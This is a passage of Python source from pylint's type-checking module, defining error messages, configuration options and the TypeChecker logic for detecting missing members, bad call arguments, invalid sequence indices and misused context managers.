"unsupported-assignment-operation", "Emitted when an object does not support item assignment " "(i.e. doesn't define __setitem__ method).", ), "E1138": ( "%r does not support item deletion", "unsupported-delete-operation", "Emitted when an object does not support item deletion " "(i.e. doesn't define __delitem__ method).", ), "E1139": ( "Invalid metaclass %r used", "invalid-metaclass", "Emitted whenever we can detect that a class is using, " "as a metaclass, something which might be invalid for using as " "a metaclass.", ), "E1140": ( "Dict key is unhashable", "unhashable-dict-key", "Emitted when a dict key is not hashable " "(i.e. doesn't define __hash__ method).", ), "E1141": ( "Unpacking a dictionary in iteration without calling .items()", "dict-iter-missing-items", "Emitted when trying to iterate through a dict without calling .items()", ), "E1142": ( "'await' should be used within an async function", "await-outside-async", "Emitted when await is used outside an async function.", ), "W1113": ( "Keyword argument before variable positional arguments list " "in the definition of %s function", "keyword-arg-before-vararg", "When defining a keyword argument before variable positional arguments, one can " "end up in having multiple values passed for the aforementioned parameter in " "case the method is called with keyword arguments.", ), "W1114": ( "Positional arguments appear to be out of order", "arguments-out-of-order", "Emitted when the caller's argument names fully match the parameter " "names in the function signature but do not have the same order.", ), "W1115": ( "Non-string value assigned to __name__", "non-str-assignment-to-dunder-name", "Emitted when a non-string vaue is assigned to __name__", ), "W1116": ( "Second argument of isinstance is not a type", "isinstance-second-argument-not-valid-type", "Emitted when the second argument of an isinstance call is not a type.", ), } # builtin sequence types in Python 2 and 3. SEQUENCE_TYPES = { "str", "unicode", "list", "tuple", "bytearray", "xrange", "range", "bytes", "memoryview", } def _emit_no_member(node, owner, owner_name, ignored_mixins=True, ignored_none=True): """Try to see if no-member should be emitted for the given owner. The following cases are ignored: * the owner is a function and it has decorators. * the owner is an instance and it has __getattr__, __getattribute__ implemented * the module is explicitly ignored from no-member checks * the owner is a class and the name can be found in its metaclass. * The access node is protected by an except handler, which handles AttributeError, Exception or bare except. * The node is guarded behind and `IF` or `IFExp` node """ # pylint: disable=too-many-return-statements if node_ignores_exception(node, AttributeError): return False if ignored_none and isinstance(owner, nodes.Const) and owner.value is None: return False if is_super(owner) or getattr(owner, "type", None) == "metaclass": return False if owner_name and ignored_mixins and owner_name[-5:].lower() == "mixin": return False if isinstance(owner, nodes.FunctionDef) and ( owner.decorators or owner.is_abstract() ): return False if isinstance(owner, (astroid.Instance, nodes.ClassDef)): if owner.has_dynamic_getattr(): # Issue #2565: Don't ignore enums, as they have a `__getattr__` but it's not # invoked at this point. try: metaclass = owner.metaclass() except astroid.MroError: return False if metaclass: # Renamed in Python 3.10 to `EnumType` return metaclass.qname() in ("enum.EnumMeta", "enum.EnumType") return False if not has_known_bases(owner): return False # Exclude typed annotations, since these might actually exist # at some point during the runtime of the program. if utils.is_attribute_typed_annotation(owner, node.attrname): return False if isinstance(owner, astroid.objects.Super): # Verify if we are dealing with an invalid Super object. # If it is invalid, then there's no point in checking that # it has the required attribute. Also, don't fail if the # MRO is invalid. try: owner.super_mro() except (astroid.MroError, astroid.SuperError): return False if not all(has_known_bases(base) for base in owner.type.mro()): return False if isinstance(owner, nodes.Module): try: owner.getattr("__getattr__") return False except astroid.NotFoundError: pass if owner_name and node.attrname.startswith("_" + owner_name): # Test if an attribute has been mangled ('private' attribute) unmangled_name = node.attrname.split("_" + owner_name)[-1] try: if owner.getattr(unmangled_name, context=None) is not None: return False except astroid.NotFoundError: return True if ( owner.parent and isinstance(owner.parent, nodes.ClassDef) and owner.parent.name == "EnumMeta" and owner_name == "__members__" and node.attrname in ["items", "values", "keys"] ): # Avoid false positive on Enum.__members__.{items(), values, keys} # See https://github.com/PyCQA/pylint/issues/4123 return False # Don't emit no-member if guarded behind `IF` or `IFExp` # * Walk up recursively until if statement is found. # * Check if condition can be inferred as `Const`, # would evaluate as `False`, # and wheater the node is part of the `body`. # * Continue checking until scope of node is reached. scope: nodes.NodeNG = node.scope() node_origin: nodes.NodeNG = node parent: nodes.NodeNG = node.parent while parent != scope: if isinstance(parent, (nodes.If, nodes.IfExp)): inferred = safe_infer(parent.test) if ( # pylint: disable=too-many-boolean-expressions isinstance(inferred, nodes.Const) and inferred.bool_value() is False and ( isinstance(parent, nodes.If) and node_origin in parent.body or isinstance(parent, nodes.IfExp) and node_origin == parent.body ) ): return False node_origin, parent = parent, parent.parent return True def _determine_callable(callable_obj): # Ordering is important, since BoundMethod is a subclass of UnboundMethod, # and Function inherits Lambda. parameters = 0 if hasattr(callable_obj, "implicit_parameters"): parameters = callable_obj.implicit_parameters() if isinstance(callable_obj, astroid.BoundMethod): # Bound methods have an extra implicit 'self' argument. return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, astroid.UnboundMethod): return callable_obj, parameters, "unbound method" if isinstance(callable_obj, nodes.FunctionDef): return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, nodes.Lambda): return callable_obj, parameters, "lambda" if isinstance(callable_obj, nodes.ClassDef): # Class instantiation, lookup __new__ instead. # If we only find object.__new__, we can safely check __init__ # instead. If __new__ belongs to builtins, then we look # again for __init__ in the locals, since we won't have # argument information for the builtin __new__ function. try: # Use the last definition of __new__. new = callable_obj.local_attr("__new__")[-1] except astroid.NotFoundError: new = None from_object = new and new.parent.scope().name == "object" from_builtins = new and new.root().name in sys.builtin_module_names if not new or from_object or from_builtins: try: # Use the last definition of __init__. callable_obj = callable_obj.local_attr("__init__")[-1] except astroid.NotFoundError as e: # do nothing, covered by no-init. raise ValueError from e else: callable_obj = new if not isinstance(callable_obj, nodes.FunctionDef): raise ValueError # both have an extra implicit 'cls'/'self' argument. return callable_obj, parameters, "constructor" raise ValueError def _has_parent_of_type(node, node_type, statement): """Check if the given node has a parent of the given type.""" parent = node.parent while not isinstance(parent, node_type) and statement.parent_of(parent): parent = parent.parent return isinstance(parent, node_type) def _no_context_variadic_keywords(node, scope): statement = node.statement() variadics = () if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef): variadics = list(node.keywords or []) + node.kwargs elif isinstance(statement, (nodes.Return, nodes.Expr, nodes.Assign)) and isinstance( statement.value, nodes.Call ): call = statement.value variadics = list(call.keywords or []) + call.kwargs return _no_context_variadic(node, scope.args.kwarg, nodes.Keyword, variadics) def _no_context_variadic_positional(node, scope): variadics = () if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef): variadics = node.starargs + node.kwargs else: statement = node.statement() if isinstance( statement, (nodes.Expr, nodes.Return, nodes.Assign) ) and isinstance(statement.value, nodes.Call): call = statement.value variadics = call.starargs + call.kwargs return _no_context_variadic(node, scope.args.vararg, nodes.Starred, variadics) def _no_context_variadic(node, variadic_name, variadic_type, variadics): """Verify if the given call node has variadic nodes without context This is a workaround for handling cases of nested call functions which don't have the specific call context at hand. Variadic arguments (variable positional arguments and variable keyword arguments) are inferred, inherently wrong, by astroid as a Tuple, respectively a Dict with empty elements. This can lead pylint to believe that a function call receives too few arguments. """ scope = node.scope() is_in_lambda_scope = not isinstance(scope, nodes.FunctionDef) and isinstance( scope, nodes.Lambda ) statement = node.statement() for name in statement.nodes_of_class(nodes.Name): if name.name != variadic_name: continue inferred = safe_infer(name) if isinstance(inferred, (nodes.List, nodes.Tuple)): length = len(inferred.elts) elif isinstance(inferred, nodes.Dict): length = len(inferred.items) else: continue if is_in_lambda_scope and isinstance(inferred.parent, nodes.Arguments): # The statement of the variadic will be the assignment itself, # so we need to go the lambda instead inferred_statement = inferred.parent.parent else: inferred_statement = inferred.statement() if not length and isinstance(inferred_statement, nodes.Lambda): is_in_starred_context = _has_parent_of_type(node, variadic_type, statement) used_as_starred_argument = any( variadic.value == name or variadic.value.parent_of(name) for variadic in variadics ) if is_in_starred_context or used_as_starred_argument: return True return False def _is_invalid_metaclass(metaclass): try: mro = metaclass.mro() except NotImplementedError: # Cannot have a metaclass which is not a newstyle class. return True else: if not any(is_builtin_object(cls) and cls.name == "type" for cls in mro): return True return False def _infer_from_metaclass_constructor(cls, func: nodes.FunctionDef): """Try to infer what the given *func* constructor is building :param astroid.FunctionDef func: A metaclass constructor. Metaclass definitions can be functions, which should accept three arguments, the name of the class, the bases of the class and the attributes. The function could return anything, but usually it should be a proper metaclass. :param astroid.ClassDef cls: The class for which the *func* parameter should generate a metaclass. :returns: The class generated by the function or None, if we couldn't infer it. :rtype: astroid.ClassDef """ context = astroid.context.InferenceContext() class_bases = nodes.List() class_bases.postinit(elts=cls.bases) attrs = nodes.Dict() local_names = [(name, values[-1]) for name, values in cls.locals.items()] attrs.postinit(local_names) builder_args = nodes.Tuple() builder_args.postinit([cls.name, class_bases, attrs]) context.callcontext = astroid.context.CallContext(builder_args) try: inferred = next(func.infer_call_result(func, context), None) except astroid.InferenceError: return None return inferred or None def _is_c_extension(module_node): return ( not astroid.modutils.is_standard_module(module_node.name) and not module_node.fully_defined() ) def _is_invalid_isinstance_type(arg): # Return True if we are sure that arg is not a type inferred = utils.safe_infer(arg) if not inferred: # Cannot infer it so skip it. return False if isinstance(inferred, nodes.Tuple): return any(_is_invalid_isinstance_type(elt) for elt in inferred.elts) if isinstance(inferred, nodes.ClassDef): return False if isinstance(inferred, astroid.Instance) and inferred.qname() == BUILTIN_TUPLE: return False return True class TypeChecker(BaseChecker): """try to find bugs in the code using type inference""" __implements__ = (IAstroidChecker,) # configuration section name name = "typecheck" # messages msgs = MSGS priority = -1 # configuration options options = ( ( "ignore-on-opaque-inference", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": "This flag controls whether pylint should warn about " "no-member and similar checks whenever an opaque object " "is returned when inferring. The inference can return " "multiple potential results while evaluating a Python object, " "but some branches might not be evaluated, which results in " "partial inference. In that case, it might be useful to still emit " "no-member and other checks for the rest of the inferred objects.", }, ), ( "ignore-mixin-members", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": 'Tells whether missing members accessed in mixin \ class should be ignored. A mixin class is detected if its name ends with \ "mixin" (case insensitive).', }, ), ( "ignore-none", { "default": True, "type": "yn", "metavar": "<y_or_n>", "help": "Tells whether to warn about missing members when the owner " "of the attribute is inferred to be None.", }, ), ( "ignored-modules", { "default": (), "type": "csv", "metavar": "<module names>", "help": "List of module names for which member attributes " "should not be checked (useful for modules/projects " "where namespaces are manipulated during runtime and " "thus existing member attributes cannot be " "deduced by static analysis). It supports qualified " "module names, as well as Unix pattern matching.", }, ), # the defaults here are *stdlib* names that (almost) always # lead to false positives, since their idiomatic use is # 'too dynamic' for pylint to grok. ( "ignored-classes", { "default": ("optparse.Values", "thread._local", "_thread._local"), "type": "csv", "metavar": "<members names>", "help": "List of class names for which member attributes " "should not be checked (useful for classes with " "dynamically set attributes). This supports " "the use of qualified names.", }, ), ( "generated-members", { "default": (), "type": "string", "metavar": "<members names>", "help": "List of members which are set dynamically and \ missed by pylint inference system, and so shouldn't trigger E1101 when \ accessed. Python regular expressions are accepted.", }, ), ( "contextmanager-decorators", { "default": ["contextlib.contextmanager"], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that produce context managers, " "such as contextlib.contextmanager. Add to this list " "to register other decorators that produce valid " "context managers.", }, ), ( "missing-member-hint-distance", { "default": 1, "type": "int", "metavar": "<member hint edit distance>", "help": "The minimum edit distance a name should have in order " "to be considered a similar match for a missing member name.", }, ), ( "missing-member-max-choices", { "default": 1, "type": "int", "metavar": "<member hint max choices>", "help": "The total number of similar names that should be taken in " "consideration when showing a hint for a missing member.", }, ), ( "missing-member-hint", { "default": True, "type": "yn", "metavar": "<missing member hint>", "help": "Show a hint with possible names when a member name was not " "found. The aspect of finding the hint is based on edit distance.", }, ), ( "signature-mutators", { "default": [], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that change the signature of " "a decorated function.", }, ), ) @astroid.decorators.cachedproperty def _suggestion_mode(self): return get_global_option(self, "suggestion-mode", default=True) @astroid.decorators.cachedproperty def _compiled_generated_members(self) -> Tuple[Pattern, ...]: # do this lazily since config not fully initialized in __init__ # generated_members may contain regular expressions # (surrounded by quote `"` and followed by a comma `,`) # REQUEST,aq_parent,"[a-zA-Z]+_set{1,2}"' => # ('REQUEST', 'aq_parent', '[a-zA-Z]+_set{1,2}') generated_members = self.config.generated_members if isinstance(generated_members, str): gen = shlex.shlex(generated_members) gen.whitespace += "," gen.wordchars += r"[]-+\.*?()|" generated_members = tuple(tok.strip('"') for tok in gen) return tuple(re.compile(exp) for exp in generated_members) @check_messages("keyword-arg-before-vararg") def visit_functiondef(self, node): # check for keyword arg before varargs if node.args.vararg and node.args.defaults: self.add_message("keyword-arg-before-vararg", node=node, args=(node.name)) visit_asyncfunctiondef = visit_functiondef @check_messages("invalid-metaclass") def visit_classdef(self, node): def _metaclass_name(metaclass): if isinstance(metaclass, (nodes.ClassDef, nodes.FunctionDef)): return metaclass.name return metaclass.as_string() metaclass = node.declared_metaclass() if not metaclass: return if isinstance(metaclass, nodes.FunctionDef): # Try to infer the result. metaclass = _infer_from_metaclass_constructor(node, metaclass) if not metaclass: # Don't do anything if we cannot infer the result. return if isinstance(metaclass, nodes.ClassDef): if _is_invalid_metaclass(metaclass): self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) else: self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) def visit_assignattr(self, node): if isinstance(node.assign_type(), nodes.AugAssign): self.visit_attribute(node) def visit_delattr(self, node): self.visit_attribute(node) @check_messages("no-member", "c-extension-no-member") def visit_attribute(self, node): """check that the accessed attribute exists to avoid too much false positives for now, we'll consider the code as correct if a single of the inferred nodes has the accessed attribute. function/method, super call and metaclasses are ignored """ if any( pattern.match(name) for name in (node.attrname, node.as_string()) for pattern in self._compiled_generated_members ): return try: inferred = list(node.expr.infer()) except astroid.InferenceError: return # list of (node, nodename) which are missing the attribute missingattr = set() non_opaque_inference_results = [ owner for owner in inferred if owner is not astroid.Uninferable and not isinstance(owner, nodes.Unknown) ] if ( len(non_opaque_inference_results) != len(inferred) and self.config.ignore_on_opaque_inference ): # There is an ambiguity in the inference. Since we can't # make sure that we won't emit a false positive, we just stop # whenever the inference returns an opaque inference object. return for owner in non_opaque_inference_results: name = getattr(owner, "name", None) if _is_owner_ignored( owner, name, self.config.ignored_classes, self.config.ignored_modules ): continue qualname = f"{owner.pytype()}.{node.attrname}" if any( pattern.match(qualname) for pattern in self._compiled_generated_members ): return try: if not [ n for n in owner.getattr(node.attrname) if not isinstance(n.statement(), nodes.AugAssign) ]: missingattr.add((owner, name)) continue except AttributeError: continue except astroid.DuplicateBasesError: continue except astroid.NotFoundError: # This can't be moved before the actual .getattr call, # because there can be more values inferred and we are # stopping after the first one which has the attribute in question. # The problem is that if the first one has the attribute, # but we continue to the next values which doesn't have the # attribute, then we'll have a false positive. # So call this only after the call has been made. if not _emit_no_member( node, owner, name, ignored_mixins=self.config.ignore_mixin_members, ignored_none=self.config.ignore_none, ): continue missingattr.add((owner, name)) continue # stop on the first found break else: # we have not found any node with the attributes, display the # message for inferred nodes done = set() for owner, name in missingattr: if isinstance(owner, astroid.Instance): actual = owner._proxied else: actual = owner if actual in done: continue done.add(actual) msg, hint = self._get_nomember_msgid_hint(node, owner) self.add_message( msg, node=node, args=(owner.display_type(), name, node.attrname, hint), confidence=INFERENCE, ) def _get_nomember_msgid_hint(self, node, owner): suggestions_are_possible = self._suggestion_mode and isinstance( owner, nodes.Module ) if suggestions_are_possible and _is_c_extension(owner): msg = "c-extension-no-member" hint = "" else: msg = "no-member" if self.config.missing_member_hint: hint = _missing_member_hint( owner, node.attrname, self.config.missing_member_hint_distance, self.config.missing_member_max_choices, ) else: hint = "" return msg, hint @check_messages( "assignment-from-no-return", "assignment-from-none", "non-str-assignment-to-dunder-name", ) def visit_assign(self, node): """ Process assignments in the AST. """ self._check_assignment_from_function_call(node) self._check_dundername_is_string(node) def _check_assignment_from_function_call(self, node): """check that if assigning to a function call, the function is possibly returning something valuable """ if not isinstance(node.value, nodes.Call): return function_node = safe_infer(node.value.func) funcs = (nodes.FunctionDef, astroid.UnboundMethod, astroid.BoundMethod) if not isinstance(function_node, funcs): return # Unwrap to get the actual function object if isinstance(function_node, astroid.BoundMethod) and isinstance( function_node._proxied, astroid.UnboundMethod ): function_node = function_node._proxied._proxied # Make sure that it's a valid function that we can analyze. # Ordered from less expensive to more expensive checks. # pylint: disable=too-many-boolean-expressions if ( not function_node.is_function or isinstance(function_node, nodes.AsyncFunctionDef) or function_node.decorators or function_node.is_generator() or function_node.is_abstract(pass_is_abstract=False) or utils.is_error(function_node) or not function_node.root().fully_defined() ): return returns = list( function_node.nodes_of_class(nodes.Return, skip_klass=nodes.FunctionDef) ) if not returns: self.add_message("assignment-from-no-return", node=node) else: for rnode in returns: if not ( isinstance(rnode.value, nodes.Const) and rnode.value.value is None or rnode.value is None ): break else: self.add_message("assignment-from-none", node=node) def _check_dundername_is_string(self, node): """ Check a string is assigned to self.__name__ """ # Check the left hand side of the assignment is <something>.__name__ lhs = node.targets[0] if not isinstance(lhs, nodes.AssignAttr): return if not lhs.attrname == "__name__": return # If the right hand side is not a string rhs = node.value if isinstance(rhs, nodes.Const) and isinstance(rhs.value, str): return inferred = utils.safe_infer(rhs) if not inferred: return if not (isinstance(inferred, nodes.Const) and isinstance(inferred.value, str)): # Add the message self.add_message("non-str-assignment-to-dunder-name", node=node) def _check_uninferable_call(self, node): """ Check that the given uninferable Call node does not call an actual function. """ if not isinstance(node.func, nodes.Attribute): return # Look for properties. First, obtain # the lhs of the Attribute node and search the attribute # there. If that attribute is a property or a subclass of properties, # then most likely it's not callable. expr = node.func.expr klass = safe_infer(expr) if ( klass is None or klass is astroid.Uninferable or not isinstance(klass, astroid.Instance) ): return try: attrs = klass._proxied.getattr(node.func.attrname) except astroid.NotFoundError: return for attr in attrs: if attr is astroid.Uninferable: continue if not isinstance(attr, nodes.FunctionDef): continue # Decorated, see if it is decorated with a property. # Also, check the returns and see if they are callable. if decorated_with_property(attr): try: all_returns_are_callable = all( return_node.callable() or return_node is astroid.Uninferable for return_node in attr.infer_call_result(node) ) except astroid.InferenceError: continue if not all_returns_are_callable: self.add_message( "not-callable", node=node, args=node.func.as_string() ) break def _check_argument_order(self, node, call_site, called, called_param_names): """Match the supplied argument names against the function parameters. Warn if some argument names are not in the same order as they are in the function signature. """ # Check for called function being an object instance function # If so, ignore the initial 'self' argument in the signature try: is_classdef = isinstance(called.parent, nodes.ClassDef) if is_classdef and called_param_names[0] == "self": called_param_names = called_param_names[1:] except IndexError: return try: # extract argument names, if they have names calling_parg_names = [p.name for p in call_site.positional_arguments] # Additionally get names of keyword arguments to use in a full match # against parameters calling_kwarg_names = [ arg.name for arg in call_site.keyword_arguments.values() ] except AttributeError: # the type of arg does not provide a `.name`. In this case we # stop checking for out-of-order arguments because it is only relevant # for named variables. return # Don't check for ordering if there is an unmatched arg or param arg_set = set(calling_parg_names) | set(calling_kwarg_names) param_set = set(called_param_names) if arg_set != param_set: return # Warn based on the equality of argument ordering if calling_parg_names != called_param_names[: len(calling_parg_names)]: self.add_message("arguments-out-of-order", node=node, args=()) def _check_isinstance_args(self, node): if len(node.args) != 2: # isinstance called with wrong number of args return second_arg = node.args[1] if _is_invalid_isinstance_type(second_arg): self.add_message("isinstance-second-argument-not-valid-type", node=node) # pylint: disable=too-many-branches,too-many-locals @check_messages(*(list(MSGS.keys()))) def visit_call(self, node): """check that called functions/methods are inferred to callable objects, and that the arguments passed to the function match the parameters in the inferred function's definition """ called = safe_infer(node.func) # only function, generator and object defining __call__ are allowed # Ignore instances of descriptors since astroid cannot properly handle them # yet if called and not called.callable(): if isinstance(called, astroid.Instance) and ( not has_known_bases(called) or ( called.parent is not None and isinstance(called.scope(), nodes.ClassDef) and "__get__" in called.locals ) ): # Don't emit if we can't make sure this object is callable. pass else: self.add_message("not-callable", node=node, args=node.func.as_string()) self._check_uninferable_call(node) try: called, implicit_args, callable_name = _determine_callable(called) except ValueError: # Any error occurred during determining the function type, most of # those errors are handled by different warnings. return if called.args.args is None: if called.name == "isinstance": # Verify whether second argument of isinstance is a valid type self._check_isinstance_args(node) # Built-in functions have no argument information. return if len(called.argnames()) != len(set(called.argnames())): # Duplicate parameter name (see duplicate-argument). We can't really # make sense of the function call in this case, so just return. return # Build the set of keyword arguments, checking for duplicate keywords, # and count the positional arguments. call_site = astroid.arguments.CallSite.from_call(node) # Warn about duplicated keyword arguments, such as `f=24, **{'f': 24}` for keyword in call_site.duplicated_keywords: self.add_message("repeated-keyword", node=node, args=(keyword,)) if call_site.has_invalid_arguments() or call_site.has_invalid_keywords(): # Can't make sense of this. return # Has the function signature changed in ways we cannot reliably detect? if hasattr(called, "decorators") and decorated_with( called, self.config.signature_mutators ): return num_positional_args = len(call_site.positional_arguments) keyword_args = list(call_site.keyword_arguments.keys()) overload_function = is_overload_stub(called) # Determine if we don't have a context for our call and we use variadics. node_scope = node.scope() if isinstance(node_scope, (nodes.Lambda, nodes.FunctionDef)): has_no_context_positional_variadic = _no_context_variadic_positional( node, node_scope ) has_no_context_keywords_variadic = _no_context_variadic_keywords( node, node_scope ) else: has_no_context_positional_variadic = ( has_no_context_keywords_variadic ) = False # These are coming from the functools.partial implementation in astroid already_filled_positionals = getattr(called, "filled_positionals", 0) already_filled_keywords = getattr(called, "filled_keywords", {}) keyword_args += list(already_filled_keywords) num_positional_args += implicit_args + already_filled_positionals # Analyze the list of formal parameters. args = list(itertools.chain(called.args.posonlyargs or (), called.args.args)) num_mandatory_parameters = len(args) - len(called.args.defaults) parameters = [] parameter_name_to_index = {} for i, arg in enumerate(args): if isinstance(arg, nodes.Tuple): name = None # Don't store any parameter names within the tuple, since those # are not assignable from keyword arguments. else: assert isinstance(arg, nodes.AssignName) # This occurs with: # def f( (a), (b) ): pass name = arg.name parameter_name_to_index[name] = i if i >= num_mandatory_parameters: defval = called.args.defaults[i - num_mandatory_parameters] else: defval = None parameters.append([(name, defval), False]) kwparams = {} for i, arg in enumerate(called.args.kwonlyargs): if isinstance(arg, nodes.Keyword): name = arg.arg else: assert isinstance(arg, nodes.AssignName) name = arg.name kwparams[name] = [called.args.kw_defaults[i], False] self._check_argument_order( node, call_site, called, [p[0][0] for p in parameters] ) # 1. Match the positional arguments. for i in range(num_positional_args): if i < len(parameters): parameters[i][1] = True elif called.args.vararg is not None: # The remaining positional arguments get assigned to the *args # parameter. break elif not overload_function: # Too many positional arguments. self.add_message( "too-many-function-args", node=node, args=(callable_name,) ) break # 2. Match the keyword arguments. for keyword in keyword_args: if keyword in parameter_name_to_index: i = parameter_name_to_index[keyword] if parameters[i][1]: # Duplicate definition of function parameter. # Might be too hardcoded, but this can actually # happen when using str.format and `self` is passed # by keyword argument, as in `.format(self=self)`. # It's perfectly valid to so, so we're just skipping # it if that's the case. if not (keyword == "self" and called.qname() in STR_FORMAT): self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: parameters[i][1] = True elif keyword in kwparams: if kwparams[keyword][1]: # Duplicate definition of function parameter. self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: kwparams[keyword][1] = True elif called.args.kwarg is not None: # The keyword argument gets assigned to the **kwargs parameter. pass elif not overload_function: # Unexpected keyword argument. self.add_message( "unexpected-keyword-arg", node=node, args=(keyword, callable_name) ) # 3. Match the **kwargs, if any. if node.kwargs: for i, [(name, defval), assigned] in enumerate(parameters): # Assume that *kwargs provides values for all remaining # unassigned named parameters. if name is not None: parameters[i][1] = True else: # **kwargs can't assign to tuples. pass # Check that any parameters without a default have been assigned # values. for [(name, defval), assigned] in parameters: if (defval is None) and not assigned: if name is None: display_name = "<tuple>" else: display_name = repr(name) if not has_no_context_positional_variadic and not overload_function: self.add_message( "no-value-for-parameter", node=node, args=(display_name, callable_name), ) for name, val in kwparams.items(): defval, assigned = val if ( defval is None and not assigned and not has_no_context_keywords_variadic and not overload_function ): self.add_message("missing-kwoa", node=node, args=(name, callable_name)) def _check_invalid_sequence_index(self, subscript: nodes.Subscript): # Look for index operations where the parent is a sequence type. # If the types can be determined, only allow indices to be int, # slice or instances with __index__. parent_type = safe_infer(subscript.value) if not isinstance( parent_type, (nodes.ClassDef, astroid.Instance) ) or not has_known_bases(parent_type): return None # Determine what method on the parent this index will use # The parent of this node will be a Subscript, and the parent of that # node determines if the Subscript is a get, set, or delete operation. if subscript.ctx is astroid.Store: methodname = "__setitem__" elif subscript.ctx is astroid.Del: methodname = "__delitem__" else: methodname = "__getitem__" # Check if this instance's __getitem__, __setitem__, or __delitem__, as # appropriate to the statement, is implemented in a builtin sequence # type. This way we catch subclasses of sequence types but skip classes # that override __getitem__ and which may allow non-integer indices. try: methods = astroid.interpreter.dunder_lookup.lookup(parent_type, methodname) if methods is astroid.Uninferable: return None itemmethod = methods[0] except ( astroid.AttributeInferenceError, IndexError, ): return None if ( not isinstance(itemmethod, nodes.FunctionDef) or itemmethod.root().name != BUILTINS or not itemmethod.parent or itemmethod.parent.name not in SEQUENCE_TYPES ): return None # For ExtSlice objects coming from visit_extslice, no further # inference is necessary, since if we got this far the ExtSlice # is an error. if isinstance(subscript.value, nodes.ExtSlice): index_type = subscript.value else: index_type = safe_infer(subscript.slice) if index_type is None or index_type is astroid.Uninferable: return None # Constants must be of type int if isinstance(index_type, nodes.Const): if isinstance(index_type.value, int): return None # Instance values must be int, slice, or have an __index__ method elif isinstance(index_type, astroid.Instance): if index_type.pytype() in (BUILTINS + ".int", BUILTINS + ".slice"): return None try: index_type.getattr("__index__") return None except astroid.NotFoundError: pass elif isinstance(index_type, nodes.Slice): # A slice can be present # here after inferring the index node, which could # be a `slice(...)` call for instance. return self._check_invalid_slice_index(index_type) # Anything else is an error self.add_message("invalid-sequence-index", node=subscript) return None @check_messages("invalid-sequence-index") def visit_extslice(self, node): if not node.parent or not hasattr(node.parent, "value"): return None # Check extended slice objects as if they were used as a sequence # index to check if the object being sliced can support them return self._check_invalid_sequence_index(node.parent) def _check_invalid_slice_index(self, node): # Check the type of each part of the slice invalid_slices = 0 for index in (node.lower, node.upper, node.step): if index is None: continue index_type = safe_infer(index) if index_type is None or index_type is astroid.Uninferable: continue # Constants must of type int or None if isinstance(index_type, nodes.Const): if isinstance(index_type.value, (int, type(None))): continue # Instance values must be of type int, None or an object # with __index__ elif isinstance(index_type, astroid.Instance): if index_type.pytype() in (BUILTINS + ".int", BUILTINS + ".NoneType"): continue try: index_type.getattr("__index__") return except astroid.NotFoundError: pass invalid_slices += 1 if not invalid_slices: return # Anything else is an error, unless the object that is indexed # is a custom object, which knows how to handle this kind of slices parent = node.parent if isinstance(parent, nodes.ExtSlice): parent = parent.parent if isinstance(parent, nodes.Subscript): inferred = safe_infer(parent.value) if inferred is None or inferred is astroid.Uninferable: # Don't know what this is return known_objects = ( nodes.List, nodes.Dict, nodes.Tuple, astroid.objects.FrozenSet, nodes.Set, ) if not isinstance(inferred, known_objects): # Might be an instance that knows how to handle this slice object return for _ in range(invalid_slices): self.add_message("invalid-slice-index", node=node) @check_messages("not-context-manager") def visit_with(self, node): for ctx_mgr, _ in node.items: context = astroid.context.InferenceContext() inferred = safe_infer(ctx_mgr, context=context) if inferred is None or inferred is astroid.Uninferable: continue if isinstance(inferred, astroid.bases.Generator): # Check if we are dealing with a function decorated # with contextlib.contextmanager. if decorated_with( inferred.parent, self.config.contextmanager_decorators ): continue # If the parent of the generator is not the context manager itself, # that means that it could have been returned from another # function which was the real context manager. # The following approach is more of a hack rather than a real # solution: walk all the inferred statements for the # given *ctx_mgr* and if you find one function scope # which is decorated, consider it to be the real # manager and give up, otherwise emit not-context-manager. # See the test file for not_context_manager for a couple # of self explaining tests. # Retrieve node from all previusly visited nodes in the the inference history context_path_names = filter(None, _unflatten(context.path)) inferred_paths = _flatten_container( safe_infer(path) for path in context_path_names ) for inferred_path in inferred_paths: if not inferred_path: continue scope = inferred_path.scope() if not isinstance(scope, nodes.FunctionDef): continue if decorated_with(scope, self.config.contextmanager_decorators): break else: self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) else: try: inferred.getattr("__enter__") inferred.getattr("__exit__") except astroid.NotFoundError: if isinstance(inferred, astroid.Instance): # If we do not know the bases of this class, # just skip it. if not has_known_bases(inferred): continue # Just ignore mixin classes. if self.config.ignore_mixin_members: if inferred.name[-5:].lower() == "mixin": continue self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) @check_messages("invalid-unary-operand-type") def visit_unaryop(self, node): """Detect TypeErrors for unary operands.""" for error in node.type_errors(): # Let the error customize its output. self.add_message("invalid-unary-operand-type", args=str(error), node=node) @check_messages("unsupported-binary-operation") def visit_binop(self, node: nodes.BinOp): if node.op == "|": self._detect_unsupported_alternative_union_syntax(node) def _detect_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Detect if unsupported alternative Union syntax (PEP 604) was used.""" if PY310_PLUS: # 310+ supports the new syntax return if isinstance( node.parent, TYPE_ANNOTATION_NODES_TYPES ) and not is_postponed_evaluation_enabled(node): # Use in type annotations only allowed if # postponed evaluation is enabled. self._check_unsupported_alternative_union_syntax(node) if isinstance( node.parent, ( nodes.Assign, nodes.Call, nodes.Keyword, nodes.Dict, nodes.Tuple, nodes.Set, nodes.List, nodes.BinOp, ), ): # Check other contexts the syntax might appear, but are invalid. # Make sure to filter context if postponed evaluation is enabled # and parent is allowed node type. allowed_nested_syntax = False if is_postponed_evaluation_enabled(node): parent_node = node.parent while True: if isinstance(parent_node, TYPE_ANNOTATION_NODES_TYPES): allowed_nested_syntax = True break parent_node = parent_node.parent if isinstance(parent_node, nodes.Module): break if not allowed_nested_syntax: self._check_unsupported_alternative_union_syntax(node) def _check_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Check if left or right node is of type `type`.""" msg = "unsupported operand type(s) for |" for n in (node.left, node.right): n = astroid.helpers.object_type(n) if isinstance(n, nodes.ClassDef) and 